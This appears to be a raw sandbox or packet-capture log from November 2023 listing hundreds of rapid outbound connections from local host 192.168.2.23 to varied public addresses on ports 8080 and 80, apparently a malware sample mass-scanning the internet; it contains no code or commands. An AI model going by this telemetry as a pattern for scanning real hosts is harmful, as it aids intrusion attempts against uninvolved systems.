                                                              Nov 13, 2023 22:17:59.737848043 CET139488080192.168.2.2385.113.194.204
                                                              Nov 13, 2023 22:17:59.737849951 CET139488080192.168.2.2395.155.131.135
                                                              Nov 13, 2023 22:17:59.737865925 CET139488080192.168.2.2395.200.237.159
                                                              Nov 13, 2023 22:17:59.737869978 CET1343680192.168.2.2388.213.114.60
                                                              Nov 13, 2023 22:17:59.737870932 CET139488080192.168.2.2362.167.114.63
                                                              Nov 13, 2023 22:17:59.737879038 CET139488080192.168.2.2395.215.154.214
                                                              Nov 13, 2023 22:17:59.737879992 CET139488080192.168.2.2362.58.121.227
                                                              Nov 13, 2023 22:17:59.737884045 CET139488080192.168.2.2394.136.190.245
                                                              Nov 13, 2023 22:17:59.737900019 CET1343680192.168.2.2388.36.75.227
                                                              Nov 13, 2023 22:17:59.737900972 CET139488080192.168.2.2385.67.188.102
                                                              Nov 13, 2023 22:17:59.737901926 CET139488080192.168.2.2385.170.249.77
                                                              Nov 13, 2023 22:17:59.737903118 CET139488080192.168.2.2385.227.249.125
                                                              Nov 13, 2023 22:17:59.737903118 CET139488080192.168.2.2385.3.87.67
                                                              Nov 13, 2023 22:17:59.737906933 CET139488080192.168.2.2362.25.112.113
                                                              Nov 13, 2023 22:17:59.737906933 CET139488080192.168.2.2362.132.47.37
                                                              Nov 13, 2023 22:17:59.737909079 CET139488080192.168.2.2385.92.178.134
                                                              Nov 13, 2023 22:17:59.737926960 CET1343680192.168.2.2388.209.244.115
                                                              Nov 13, 2023 22:17:59.737926960 CET139488080192.168.2.2362.126.42.51
                                                              Nov 13, 2023 22:17:59.737929106 CET139488080192.168.2.2394.12.222.180
                                                              Nov 13, 2023 22:17:59.737929106 CET139488080192.168.2.2385.147.153.183
                                                              Nov 13, 2023 22:17:59.737929106 CET139488080192.168.2.2395.92.0.47
                                                              Nov 13, 2023 22:17:59.737947941 CET1343680192.168.2.2388.237.226.132
                                                              Nov 13, 2023 22:17:59.737950087 CET139488080192.168.2.2385.201.201.103
                                                              Nov 13, 2023 22:17:59.737951040 CET139488080192.168.2.2385.198.144.167
                                                              Nov 13, 2023 22:17:59.737955093 CET139488080192.168.2.2394.98.89.243
                                                              Nov 13, 2023 22:17:59.737955093 CET139488080192.168.2.2394.208.95.246
                                                              Nov 13, 2023 22:17:59.737957954 CET139488080192.168.2.2394.185.68.209
                                                              Nov 13, 2023 22:17:59.737958908 CET139488080192.168.2.2394.108.149.57
                                                              Nov 13, 2023 22:17:59.737961054 CET139488080192.168.2.2362.206.119.166
                                                              Nov 13, 2023 22:17:59.737968922 CET139488080192.168.2.2362.108.23.77
                                                              Nov 13, 2023 22:17:59.737987041 CET139488080192.168.2.2394.222.58.160
                                                              Nov 13, 2023 22:17:59.737987041 CET1343680192.168.2.2388.217.230.72
                                                              Nov 13, 2023 22:17:59.737987041 CET139488080192.168.2.2395.106.198.190
                                                              Nov 13, 2023 22:17:59.737991095 CET139488080192.168.2.2395.190.71.80
                                                              Nov 13, 2023 22:17:59.737993956 CET139488080192.168.2.2385.126.206.65
                                                              Nov 13, 2023 22:17:59.737996101 CET1343680192.168.2.2388.228.20.64
                                                              Nov 13, 2023 22:17:59.738006115 CET139488080192.168.2.2385.57.48.11
                                                              Nov 13, 2023 22:17:59.738013983 CET139488080192.168.2.2385.138.124.57
                                                              Nov 13, 2023 22:17:59.738014936 CET139488080192.168.2.2395.199.250.143
                                                              Nov 13, 2023 22:17:59.738015890 CET139488080192.168.2.2385.74.177.195
                                                              Nov 13, 2023 22:17:59.738015890 CET139488080192.168.2.2385.107.195.233
                                                              Nov 13, 2023 22:17:59.738018036 CET139488080192.168.2.2331.71.189.33
                                                              Nov 13, 2023 22:17:59.738018036 CET139488080192.168.2.2395.95.100.194
                                                              Nov 13, 2023 22:17:59.738023996 CET139488080192.168.2.2362.193.114.42
                                                              Nov 13, 2023 22:17:59.738023996 CET139488080192.168.2.2331.89.246.30
                                                              Nov 13, 2023 22:17:59.738039017 CET1343680192.168.2.2388.1.186.54
                                                              Nov 13, 2023 22:17:59.738040924 CET139488080192.168.2.2331.244.208.131
                                                              Nov 13, 2023 22:17:59.738040924 CET139488080192.168.2.2362.103.130.20
                                                              Nov 13, 2023 22:17:59.738048077 CET139488080192.168.2.2394.220.107.63
                                                              Nov 13, 2023 22:17:59.738056898 CET139488080192.168.2.2331.23.122.49
                                                              Nov 13, 2023 22:17:59.738059044 CET139488080192.168.2.2385.31.136.126
                                                              Nov 13, 2023 22:17:59.738065958 CET139488080192.168.2.2331.119.40.41
                                                              Nov 13, 2023 22:17:59.738078117 CET1343680192.168.2.2388.190.23.54
                                                              Nov 13, 2023 22:17:59.738080978 CET139488080192.168.2.2394.12.169.96
                                                              Nov 13, 2023 22:17:59.738087893 CET139488080192.168.2.2394.255.89.25
                                                              Nov 13, 2023 22:17:59.738089085 CET139488080192.168.2.2394.232.209.130
                                                              Nov 13, 2023 22:17:59.738089085 CET139488080192.168.2.2394.36.196.77
                                                              Nov 13, 2023 22:17:59.738101959 CET139488080192.168.2.2331.154.166.79
                                                              Nov 13, 2023 22:17:59.738110065 CET1343680192.168.2.2388.203.240.87
                                                              Nov 13, 2023 22:17:59.738111973 CET139488080192.168.2.2385.36.207.164
                                                              Nov 13, 2023 22:17:59.738120079 CET139488080192.168.2.2331.122.143.188
                                                              Nov 13, 2023 22:17:59.738120079 CET1343680192.168.2.2388.24.111.35
                                                              Nov 13, 2023 22:17:59.738120079 CET139488080192.168.2.2331.141.145.211
                                                              Nov 13, 2023 22:17:59.738136053 CET139488080192.168.2.2395.161.197.157
                                                              Nov 13, 2023 22:17:59.738149881 CET139488080192.168.2.2362.185.45.187
                                                              Nov 13, 2023 22:17:59.738152981 CET139488080192.168.2.2331.38.1.247
                                                              Nov 13, 2023 22:17:59.738153934 CET139488080192.168.2.2394.217.170.185
                                                              Nov 13, 2023 22:17:59.738168001 CET139488080192.168.2.2395.46.220.230
                                                              Nov 13, 2023 22:17:59.738171101 CET139488080192.168.2.2331.30.221.77
                                                              Nov 13, 2023 22:17:59.738172054 CET1343680192.168.2.2388.11.92.224
                                                              Nov 13, 2023 22:17:59.738173008 CET139488080192.168.2.2362.128.235.218
                                                              Nov 13, 2023 22:17:59.738173962 CET139488080192.168.2.2395.83.5.234
                                                              Nov 13, 2023 22:17:59.738188982 CET139488080192.168.2.2362.144.147.217
                                                              Nov 13, 2023 22:17:59.738188982 CET139488080192.168.2.2331.247.30.184
                                                              Nov 13, 2023 22:17:59.738189936 CET139488080192.168.2.2395.32.23.30
                                                              Nov 13, 2023 22:17:59.738190889 CET139488080192.168.2.2385.34.237.241
                                                              Nov 13, 2023 22:17:59.738190889 CET1343680192.168.2.2388.234.232.184
                                                              Nov 13, 2023 22:17:59.738197088 CET139488080192.168.2.2395.19.38.240
                                                              Nov 13, 2023 22:17:59.738198996 CET139488080192.168.2.2394.105.174.63
                                                              Nov 13, 2023 22:17:59.738209009 CET139488080192.168.2.2385.130.211.220
                                                              Nov 13, 2023 22:17:59.738214970 CET1343680192.168.2.2388.255.160.134
                                                              Nov 13, 2023 22:17:59.738224030 CET139488080192.168.2.2385.33.27.96
                                                              Nov 13, 2023 22:17:59.738224030 CET139488080192.168.2.2331.49.174.239
                                                              Nov 13, 2023 22:17:59.738224030 CET1343680192.168.2.2388.190.240.15
                                                              Nov 13, 2023 22:17:59.738230944 CET139488080192.168.2.2385.162.221.68
                                                              Nov 13, 2023 22:17:59.738245010 CET139488080192.168.2.2331.166.41.184
                                                              Nov 13, 2023 22:17:59.738245010 CET139488080192.168.2.2394.48.203.78
                                                              Nov 13, 2023 22:17:59.738245964 CET1343680192.168.2.2388.58.120.108
                                                              Nov 13, 2023 22:17:59.738250971 CET139488080192.168.2.2362.29.114.4
                                                              Nov 13, 2023 22:17:59.738250971 CET139488080192.168.2.2395.59.70.142
                                                              Nov 13, 2023 22:17:59.738264084 CET139488080192.168.2.2395.41.30.244
                                                              Nov 13, 2023 22:17:59.738265991 CET139488080192.168.2.2331.212.246.24
                                                              Nov 13, 2023 22:17:59.738271952 CET1343680192.168.2.2388.176.145.195
                                                              Nov 13, 2023 22:17:59.738276958 CET139488080192.168.2.2394.6.132.14
                                                              Nov 13, 2023 22:17:59.738286018 CET139488080192.168.2.2394.37.81.228
                                                              Nov 13, 2023 22:17:59.738298893 CET139488080192.168.2.2362.124.227.159
                                                              Nov 13, 2023 22:17:59.738297939 CET1343680192.168.2.2388.75.122.137
                                                              Nov 13, 2023 22:17:59.738301039 CET139488080192.168.2.2331.235.88.114
                                                              Nov 13, 2023 22:17:59.738317013 CET1343680192.168.2.2388.59.19.93
                                                              Nov 13, 2023 22:17:59.738318920 CET139488080192.168.2.2331.143.44.101
                                                              Nov 13, 2023 22:17:59.738320112 CET139488080192.168.2.2385.27.181.184
                                                              Nov 13, 2023 22:17:59.738320112 CET139488080192.168.2.2395.235.58.40
                                                              Nov 13, 2023 22:17:59.738320112 CET139488080192.168.2.2331.58.155.95
                                                              Nov 13, 2023 22:17:59.738322020 CET139488080192.168.2.2395.73.125.12
                                                              Nov 13, 2023 22:17:59.738333941 CET139488080192.168.2.2331.243.110.128
                                                              Nov 13, 2023 22:17:59.738337994 CET139488080192.168.2.2395.241.92.2
                                                              Nov 13, 2023 22:17:59.738341093 CET1343680192.168.2.2388.168.226.218
                                                              Nov 13, 2023 22:17:59.738347054 CET139488080192.168.2.2395.44.214.60
                                                              Nov 13, 2023 22:17:59.738354921 CET1343680192.168.2.2388.152.144.125
                                                              Nov 13, 2023 22:17:59.738363981 CET139488080192.168.2.2395.164.171.235
                                                              Nov 13, 2023 22:17:59.738363981 CET139488080192.168.2.2362.91.228.210
                                                              Nov 13, 2023 22:17:59.738375902 CET1343680192.168.2.2388.128.50.245
                                                              Nov 13, 2023 22:17:59.738380909 CET139488080192.168.2.2394.92.235.19
                                                              Nov 13, 2023 22:17:59.738382101 CET139488080192.168.2.2362.230.77.68
                                                              Nov 13, 2023 22:17:59.738384008 CET139488080192.168.2.2385.149.161.200
                                                              Nov 13, 2023 22:17:59.738384962 CET139488080192.168.2.2362.116.105.15
                                                              Nov 13, 2023 22:17:59.738398075 CET139488080192.168.2.2362.247.32.136
                                                              Nov 13, 2023 22:17:59.738399982 CET139488080192.168.2.2362.219.7.50
                                                              Nov 13, 2023 22:17:59.738404036 CET139488080192.168.2.2394.151.107.6
                                                              Nov 13, 2023 22:17:59.738410950 CET139488080192.168.2.2394.195.78.136
                                                              Nov 13, 2023 22:17:59.738419056 CET139488080192.168.2.2385.32.119.203
                                                              Nov 13, 2023 22:17:59.738421917 CET139488080192.168.2.2385.240.172.101
                                                              Nov 13, 2023 22:17:59.738421917 CET1343680192.168.2.2388.17.11.142
                                                              Nov 13, 2023 22:17:59.738426924 CET139488080192.168.2.2385.126.1.163
                                                              Nov 13, 2023 22:17:59.738439083 CET139488080192.168.2.2385.152.103.231
                                                              Nov 13, 2023 22:17:59.738445997 CET139488080192.168.2.2362.80.171.218
                                                              Nov 13, 2023 22:17:59.738447905 CET139488080192.168.2.2385.245.8.77
                                                              Nov 13, 2023 22:17:59.738449097 CET139488080192.168.2.2395.233.213.46
                                                              Nov 13, 2023 22:17:59.738452911 CET1343680192.168.2.2388.37.248.119
                                                              Nov 13, 2023 22:17:59.738459110 CET139488080192.168.2.2331.215.55.18
                                                              Nov 13, 2023 22:17:59.738467932 CET139488080192.168.2.2362.128.49.58
                                                              Nov 13, 2023 22:17:59.738467932 CET139488080192.168.2.2394.23.166.130
                                                              Nov 13, 2023 22:17:59.738477945 CET139488080192.168.2.2385.207.64.214
                                                              Nov 13, 2023 22:17:59.738480091 CET139488080192.168.2.2395.147.21.166
                                                              Nov 13, 2023 22:17:59.738483906 CET139488080192.168.2.2331.207.208.117
                                                              Nov 13, 2023 22:17:59.738493919 CET1343680192.168.2.2388.83.80.91
                                                              Nov 13, 2023 22:17:59.738502026 CET139488080192.168.2.2385.63.130.130
                                                              Nov 13, 2023 22:17:59.738507032 CET1343680192.168.2.2388.104.242.199
                                                              Nov 13, 2023 22:17:59.738523960 CET139488080192.168.2.2385.141.38.5
                                                              Nov 13, 2023 22:17:59.738532066 CET139488080192.168.2.2362.5.47.57
                                                              Nov 13, 2023 22:17:59.738533020 CET139488080192.168.2.2395.167.208.79
                                                              Nov 13, 2023 22:17:59.738533974 CET139488080192.168.2.2331.193.252.131
                                                              Nov 13, 2023 22:17:59.738533020 CET139488080192.168.2.2394.191.161.206
                                                              Nov 13, 2023 22:17:59.738538027 CET139488080192.168.2.2385.136.210.49
                                                              Nov 13, 2023 22:17:59.738533974 CET139488080192.168.2.2394.77.12.105
                                                              Nov 13, 2023 22:17:59.738538027 CET139488080192.168.2.2395.186.142.87
                                                              Nov 13, 2023 22:17:59.738542080 CET1343680192.168.2.2388.99.231.68
                                                              Nov 13, 2023 22:17:59.738542080 CET139488080192.168.2.2385.71.18.205
                                                              Nov 13, 2023 22:17:59.738548040 CET139488080192.168.2.2395.144.127.77
                                                              Nov 13, 2023 22:17:59.738548040 CET139488080192.168.2.2394.30.216.43
                                                              Nov 13, 2023 22:17:59.738554955 CET139488080192.168.2.2385.61.230.31
                                                              Nov 13, 2023 22:17:59.738558054 CET139488080192.168.2.2362.67.76.97
                                                              Nov 13, 2023 22:17:59.738559008 CET139488080192.168.2.2362.253.219.215
                                                              Nov 13, 2023 22:17:59.738563061 CET139488080192.168.2.2385.106.231.144
                                                              Nov 13, 2023 22:17:59.738569021 CET139488080192.168.2.2362.246.84.227
                                                              Nov 13, 2023 22:17:59.738569021 CET1343680192.168.2.2388.177.151.239
                                                              Nov 13, 2023 22:17:59.738569021 CET139488080192.168.2.2362.240.154.113
                                                              Nov 13, 2023 22:17:59.738571882 CET139488080192.168.2.2362.194.110.136
                                                              Nov 13, 2023 22:17:59.738581896 CET139488080192.168.2.2362.142.111.174
                                                              Nov 13, 2023 22:17:59.738583088 CET1343680192.168.2.2388.28.237.128
                                                              Nov 13, 2023 22:17:59.738583088 CET139488080192.168.2.2331.217.42.227
                                                              Nov 13, 2023 22:17:59.738588095 CET139488080192.168.2.2394.111.155.247
                                                              Nov 13, 2023 22:17:59.738590002 CET139488080192.168.2.2395.124.39.193
                                                              Nov 13, 2023 22:17:59.738590002 CET139488080192.168.2.2394.193.116.85
                                                              Nov 13, 2023 22:17:59.738590956 CET139488080192.168.2.2394.144.17.66
                                                              Nov 13, 2023 22:17:59.738590956 CET139488080192.168.2.2385.113.186.9
                                                              Nov 13, 2023 22:17:59.738590956 CET139488080192.168.2.2331.68.40.0
                                                              Nov 13, 2023 22:17:59.738604069 CET139488080192.168.2.2394.59.182.59
                                                              Nov 13, 2023 22:17:59.738605976 CET139488080192.168.2.2395.65.39.114
                                                              Nov 13, 2023 22:17:59.738610029 CET139488080192.168.2.2395.194.80.178
                                                              Nov 13, 2023 22:17:59.738621950 CET139488080192.168.2.2394.124.251.171
                                                              Nov 13, 2023 22:17:59.738622904 CET1343680192.168.2.2388.88.1.211
                                                              Nov 13, 2023 22:17:59.738625050 CET139488080192.168.2.2394.112.80.112
                                                              Nov 13, 2023 22:17:59.738629103 CET139488080192.168.2.2394.86.80.178
                                                              Nov 13, 2023 22:17:59.738629103 CET139488080192.168.2.2362.223.51.115
                                                              Nov 13, 2023 22:17:59.738631964 CET139488080192.168.2.2362.133.91.171
                                                              Nov 13, 2023 22:17:59.738645077 CET1343680192.168.2.2388.96.186.124
                                                              Nov 13, 2023 22:17:59.738645077 CET139488080192.168.2.2395.177.205.64
                                                              Nov 13, 2023 22:17:59.738645077 CET139488080192.168.2.2385.73.164.10
                                                              Nov 13, 2023 22:17:59.738647938 CET139488080192.168.2.2331.126.25.254
                                                              Nov 13, 2023 22:17:59.738655090 CET139488080192.168.2.2394.127.148.195
                                                              Nov 13, 2023 22:17:59.738663912 CET139488080192.168.2.2394.180.212.87
                                                              Nov 13, 2023 22:17:59.738666058 CET139488080192.168.2.2395.60.157.14
                                                              Nov 13, 2023 22:17:59.738672018 CET1343680192.168.2.2388.194.149.255
                                                              Nov 13, 2023 22:17:59.738687992 CET139488080192.168.2.2395.200.17.66
                                                              Nov 13, 2023 22:17:59.738693953 CET1343680192.168.2.2388.147.199.208
                                                              Nov 13, 2023 22:17:59.738693953 CET139488080192.168.2.2362.103.241.102
                                                              Nov 13, 2023 22:17:59.738693953 CET139488080192.168.2.2394.67.242.99
                                                              Nov 13, 2023 22:17:59.738693953 CET139488080192.168.2.2362.215.69.106
                                                              Nov 13, 2023 22:17:59.738697052 CET139488080192.168.2.2394.23.61.129
                                                              Nov 13, 2023 22:17:59.738697052 CET139488080192.168.2.2395.126.97.138
                                                              Nov 13, 2023 22:17:59.738709927 CET139488080192.168.2.2362.83.136.116
                                                              Nov 13, 2023 22:17:59.738720894 CET139488080192.168.2.2385.134.78.125
                                                              Nov 13, 2023 22:17:59.738733053 CET1343680192.168.2.2388.80.73.23
                                                              Nov 13, 2023 22:17:59.738735914 CET139488080192.168.2.2362.18.249.229
                                                              Nov 13, 2023 22:17:59.738744974 CET139488080192.168.2.2362.117.172.200
                                                              Nov 13, 2023 22:17:59.738751888 CET139488080192.168.2.2394.130.226.91
                                                              Nov 13, 2023 22:17:59.738751888 CET139488080192.168.2.2395.82.5.72
                                                              Nov 13, 2023 22:17:59.738751888 CET1343680192.168.2.2388.43.227.244
                                                              Nov 13, 2023 22:17:59.738761902 CET139488080192.168.2.2394.116.158.160
                                                              Nov 13, 2023 22:17:59.738769054 CET139488080192.168.2.2331.206.43.42
                                                              Nov 13, 2023 22:17:59.738773108 CET1343680192.168.2.2388.167.125.144
                                                              Nov 13, 2023 22:17:59.738779068 CET139488080192.168.2.2394.145.76.146
                                                              Nov 13, 2023 22:17:59.738780022 CET139488080192.168.2.2395.35.127.99
                                                              Nov 13, 2023 22:17:59.738784075 CET139488080192.168.2.2362.106.123.182
                                                              Nov 13, 2023 22:17:59.738796949 CET139488080192.168.2.2394.243.232.138
                                                              Nov 13, 2023 22:17:59.738801956 CET1343680192.168.2.2388.90.54.148
                                                              Nov 13, 2023 22:17:59.738802910 CET139488080192.168.2.2362.81.211.174
                                                              Nov 13, 2023 22:17:59.738807917 CET139488080192.168.2.2362.49.62.20
                                                              Nov 13, 2023 22:17:59.738826990 CET1343680192.168.2.2388.47.220.115
                                                              Nov 13, 2023 22:17:59.738826990 CET139488080192.168.2.2385.152.144.175
                                                              Nov 13, 2023 22:17:59.738826990 CET139488080192.168.2.2385.67.76.33
                                                              Nov 13, 2023 22:17:59.738830090 CET139488080192.168.2.2331.78.4.115
                                                              Nov 13, 2023 22:17:59.738831997 CET139488080192.168.2.2385.208.23.191
                                                              Nov 13, 2023 22:17:59.738837957 CET139488080192.168.2.2394.109.61.188
                                                              Nov 13, 2023 22:17:59.738847017 CET139488080192.168.2.2362.239.181.184
                                                              Nov 13, 2023 22:17:59.738848925 CET139488080192.168.2.2385.228.29.135
                                                              Nov 13, 2023 22:17:59.738854885 CET139488080192.168.2.2385.104.163.238
                                                              Nov 13, 2023 22:17:59.738857985 CET1343680192.168.2.2388.31.66.13
                                                              Nov 13, 2023 22:17:59.738862991 CET139488080192.168.2.2395.219.44.168
                                                              Nov 13, 2023 22:17:59.738876104 CET139488080192.168.2.2331.227.228.227
                                                              Nov 13, 2023 22:17:59.738881111 CET139488080192.168.2.2394.255.217.155
                                                              Nov 13, 2023 22:17:59.738886118 CET139488080192.168.2.2362.143.49.147
                                                              Nov 13, 2023 22:17:59.738888979 CET1343680192.168.2.2388.222.231.246
                                                              Nov 13, 2023 22:17:59.738888979 CET139488080192.168.2.2395.55.184.61
                                                              Nov 13, 2023 22:17:59.738907099 CET139488080192.168.2.2331.130.0.110
                                                              Nov 13, 2023 22:17:59.738907099 CET139488080192.168.2.2362.131.17.157
                                                              Nov 13, 2023 22:17:59.738913059 CET1343680192.168.2.2388.46.113.79
                                                              Nov 13, 2023 22:17:59.738914967 CET139488080192.168.2.2394.120.235.36
                                                              Nov 13, 2023 22:17:59.738914967 CET1343680192.168.2.2388.194.15.137
                                                              Nov 13, 2023 22:17:59.738915920 CET139488080192.168.2.2362.35.82.44
                                                              Nov 13, 2023 22:17:59.738929033 CET139488080192.168.2.2362.22.168.112
                                                              Nov 13, 2023 22:17:59.738938093 CET139488080192.168.2.2385.162.204.176
                                                              Nov 13, 2023 22:17:59.738939047 CET139488080192.168.2.2395.178.106.151
                                                              Nov 13, 2023 22:17:59.738939047 CET1343680192.168.2.2388.248.202.95
                                                              Nov 13, 2023 22:17:59.738950014 CET139488080192.168.2.2394.237.149.43
                                                              Nov 13, 2023 22:17:59.738950014 CET1343680192.168.2.2388.82.106.74
                                                              Nov 13, 2023 22:17:59.738955021 CET139488080192.168.2.2395.147.255.83
                                                              Nov 13, 2023 22:17:59.738970995 CET139488080192.168.2.2362.152.13.241
                                                              Nov 13, 2023 22:17:59.738974094 CET139488080192.168.2.2331.141.208.182
                                                              Nov 13, 2023 22:17:59.738976955 CET1343680192.168.2.2388.54.117.222
                                                              Nov 13, 2023 22:17:59.738980055 CET139488080192.168.2.2394.86.37.116
                                                              Nov 13, 2023 22:17:59.738991976 CET139488080192.168.2.2385.108.113.137
                                                              Nov 13, 2023 22:17:59.738993883 CET139488080192.168.2.2385.65.101.213
                                                              Nov 13, 2023 22:17:59.738997936 CET1343680192.168.2.2388.214.120.9
                                                              Nov 13, 2023 22:17:59.739010096 CET139488080192.168.2.2362.119.155.163
                                                              Nov 13, 2023 22:17:59.739016056 CET1343680192.168.2.2388.220.36.10
                                                              Nov 13, 2023 22:17:59.739016056 CET139488080192.168.2.2394.13.129.11
                                                              Nov 13, 2023 22:17:59.739017963 CET139488080192.168.2.2394.234.129.177
                                                              Nov 13, 2023 22:17:59.739017963 CET139488080192.168.2.2394.184.209.73
                                                              Nov 13, 2023 22:17:59.739017963 CET139488080192.168.2.2395.59.184.205
                                                              Nov 13, 2023 22:17:59.739036083 CET1343680192.168.2.2388.228.152.52
                                                              Nov 13, 2023 22:17:59.739036083 CET139488080192.168.2.2394.85.23.68
                                                              Nov 13, 2023 22:17:59.739037991 CET139488080192.168.2.2385.82.104.119
                                                              Nov 13, 2023 22:17:59.739037991 CET139488080192.168.2.2362.6.119.48
                                                              Nov 13, 2023 22:17:59.739046097 CET139488080192.168.2.2394.239.54.47
                                                              Nov 13, 2023 22:17:59.739048958 CET139488080192.168.2.2385.170.161.203
                                                              Nov 13, 2023 22:17:59.739053965 CET1343680192.168.2.2388.103.110.196
                                                              Nov 13, 2023 22:17:59.739065886 CET139488080192.168.2.2385.95.82.40
                                                              Nov 13, 2023 22:17:59.739068985 CET139488080192.168.2.2362.108.155.18
                                                              Nov 13, 2023 22:17:59.739079952 CET139488080192.168.2.2331.124.95.27
                                                              Nov 13, 2023 22:17:59.739082098 CET1343680192.168.2.2388.99.83.20
                                                              Nov 13, 2023 22:17:59.739090919 CET139488080192.168.2.2385.50.224.131
                                                              Nov 13, 2023 22:17:59.739090919 CET139488080192.168.2.2395.127.187.150
                                                              Nov 13, 2023 22:17:59.739092112 CET139488080192.168.2.2394.113.8.51
                                                              Nov 13, 2023 22:17:59.739094019 CET1343680192.168.2.2388.252.57.95
                                                              Nov 13, 2023 22:17:59.739100933 CET139488080192.168.2.2385.176.196.250
                                                              Nov 13, 2023 22:17:59.739109993 CET139488080192.168.2.2362.173.79.54
                                                              Nov 13, 2023 22:17:59.739109993 CET139488080192.168.2.2362.179.38.63
                                                              Nov 13, 2023 22:17:59.739126921 CET139488080192.168.2.2385.0.84.81
                                                              Nov 13, 2023 22:17:59.739132881 CET139488080192.168.2.2394.206.220.195
                                                              Nov 13, 2023 22:17:59.739132881 CET139488080192.168.2.2395.124.45.229
                                                              Nov 13, 2023 22:17:59.739134073 CET1343680192.168.2.2388.210.168.236
                                                              Nov 13, 2023 22:17:59.739140034 CET139488080192.168.2.2394.131.5.71
                                                              Nov 13, 2023 22:17:59.739146948 CET139488080192.168.2.2331.54.126.170
                                                              Nov 13, 2023 22:17:59.739150047 CET139488080192.168.2.2395.209.52.83
                                                              Nov 13, 2023 22:17:59.739157915 CET139488080192.168.2.2395.15.110.39
                                                              Nov 13, 2023 22:17:59.739164114 CET139488080192.168.2.2362.7.168.159
                                                              Nov 13, 2023 22:17:59.739164114 CET139488080192.168.2.2395.249.65.81
                                                              Nov 13, 2023 22:17:59.739171982 CET139488080192.168.2.2394.228.202.197
                                                              Nov 13, 2023 22:17:59.739171982 CET139488080192.168.2.2385.42.15.230
                                                              Nov 13, 2023 22:17:59.739171982 CET1343680192.168.2.2388.25.135.198
                                                              Nov 13, 2023 22:17:59.739171982 CET139488080192.168.2.2394.176.115.125
                                                              Nov 13, 2023 22:17:59.739187956 CET1343680192.168.2.2388.194.20.45
                                                              Nov 13, 2023 22:17:59.739190102 CET139488080192.168.2.2362.215.74.73
                                                              Nov 13, 2023 22:17:59.739193916 CET139488080192.168.2.2331.165.102.135
                                                              Nov 13, 2023 22:17:59.739196062 CET139488080192.168.2.2395.243.127.203
                                                              Nov 13, 2023 22:17:59.739208937 CET139488080192.168.2.2394.156.210.151
                                                              Nov 13, 2023 22:17:59.739209890 CET1343680192.168.2.2388.24.90.220
                                                              Nov 13, 2023 22:17:59.739211082 CET139488080192.168.2.2331.48.147.205
                                                              Nov 13, 2023 22:17:59.739216089 CET139488080192.168.2.2395.240.62.212
                                                              Nov 13, 2023 22:17:59.739216089 CET139488080192.168.2.2385.135.47.151
                                                              Nov 13, 2023 22:17:59.739233017 CET139488080192.168.2.2395.254.8.168
                                                              Nov 13, 2023 22:17:59.739233971 CET1343680192.168.2.2388.136.219.156
                                                              Nov 13, 2023 22:17:59.739233971 CET139488080192.168.2.2331.106.87.43
                                                              Nov 13, 2023 22:17:59.739236116 CET139488080192.168.2.2395.62.35.79
                                                              Nov 13, 2023 22:17:59.739240885 CET139488080192.168.2.2385.108.220.37
                                                              Nov 13, 2023 22:17:59.739243984 CET139488080192.168.2.2331.60.195.14
                                                              Nov 13, 2023 22:17:59.739252090 CET139488080192.168.2.2331.25.51.68
                                                              Nov 13, 2023 22:17:59.739264965 CET139488080192.168.2.2394.80.148.102
                                                              Nov 13, 2023 22:17:59.739274979 CET139488080192.168.2.2394.94.35.139
                                                              Nov 13, 2023 22:17:59.739274979 CET139488080192.168.2.2394.68.202.117
                                                              Nov 13, 2023 22:17:59.739276886 CET139488080192.168.2.2395.36.1.171
                                                              Nov 13, 2023 22:17:59.739276886 CET1343680192.168.2.2388.185.136.90
                                                              Nov 13, 2023 22:17:59.739279032 CET139488080192.168.2.2362.19.162.89
                                                              Nov 13, 2023 22:17:59.739290953 CET1343680192.168.2.2388.130.48.30
                                                              Nov 13, 2023 22:17:59.739291906 CET139488080192.168.2.2331.33.199.232
                                                              Nov 13, 2023 22:17:59.739303112 CET1343680192.168.2.2388.253.66.158
                                                              Nov 13, 2023 22:17:59.739305973 CET139488080192.168.2.2362.152.76.151
                                                              Nov 13, 2023 22:17:59.739310026 CET139488080192.168.2.2362.136.126.164
                                                              Nov 13, 2023 22:17:59.739326000 CET139488080192.168.2.2395.230.251.185
                                                              Nov 13, 2023 22:17:59.739326000 CET139488080192.168.2.2331.201.178.225
                                                              Nov 13, 2023 22:17:59.739326000 CET139488080192.168.2.2385.231.28.40
                                                              Nov 13, 2023 22:17:59.739326000 CET139488080192.168.2.2394.213.11.90
                                                              Nov 13, 2023 22:17:59.739326000 CET139488080192.168.2.2362.147.124.158
                                                              Nov 13, 2023 22:17:59.739326000 CET1343680192.168.2.2388.150.101.161
                                                              Nov 13, 2023 22:17:59.739326000 CET139488080192.168.2.2362.59.173.192
                                                              Nov 13, 2023 22:17:59.739329100 CET139488080192.168.2.2385.70.53.241
                                                              Nov 13, 2023 22:17:59.739336014 CET1343680192.168.2.2388.190.214.78
                                                              Nov 13, 2023 22:17:59.739345074 CET139488080192.168.2.2362.72.156.163
                                                              Nov 13, 2023 22:17:59.739346027 CET139488080192.168.2.2331.179.198.174
                                                              Nov 13, 2023 22:17:59.739348888 CET139488080192.168.2.2331.61.163.85
                                                              Nov 13, 2023 22:17:59.739348888 CET139488080192.168.2.2394.71.98.45
                                                              Nov 13, 2023 22:17:59.739348888 CET139488080192.168.2.2395.159.63.1
                                                              Nov 13, 2023 22:17:59.739348888 CET139488080192.168.2.2385.178.73.248
                                                              Nov 13, 2023 22:17:59.739352942 CET139488080192.168.2.2395.180.223.34
                                                              Nov 13, 2023 22:17:59.739356041 CET139488080192.168.2.2394.238.83.74
                                                              Nov 13, 2023 22:17:59.739356995 CET139488080192.168.2.2362.121.157.157
                                                              Nov 13, 2023 22:17:59.739356995 CET139488080192.168.2.2394.94.91.54
                                                              Nov 13, 2023 22:17:59.739356995 CET139488080192.168.2.2395.72.20.245
                                                              Nov 13, 2023 22:17:59.739371061 CET139488080192.168.2.2362.237.233.173
                                                              Nov 13, 2023 22:17:59.739377975 CET139488080192.168.2.2362.250.197.213
                                                              Nov 13, 2023 22:17:59.739378929 CET1343680192.168.2.2388.111.12.48
                                                              Nov 13, 2023 22:17:59.739379883 CET139488080192.168.2.2331.141.174.77
                                                              Nov 13, 2023 22:17:59.739383936 CET139488080192.168.2.2395.1.122.43
                                                              Nov 13, 2023 22:17:59.739384890 CET139488080192.168.2.2395.86.24.160
                                                              Nov 13, 2023 22:17:59.739398956 CET1343680192.168.2.2388.118.4.187
                                                              Nov 13, 2023 22:17:59.739406109 CET139488080192.168.2.2331.148.108.83
                                                              Nov 13, 2023 22:17:59.739406109 CET139488080192.168.2.2395.67.92.46
                                                              Nov 13, 2023 22:17:59.739406109 CET139488080192.168.2.2362.118.85.140
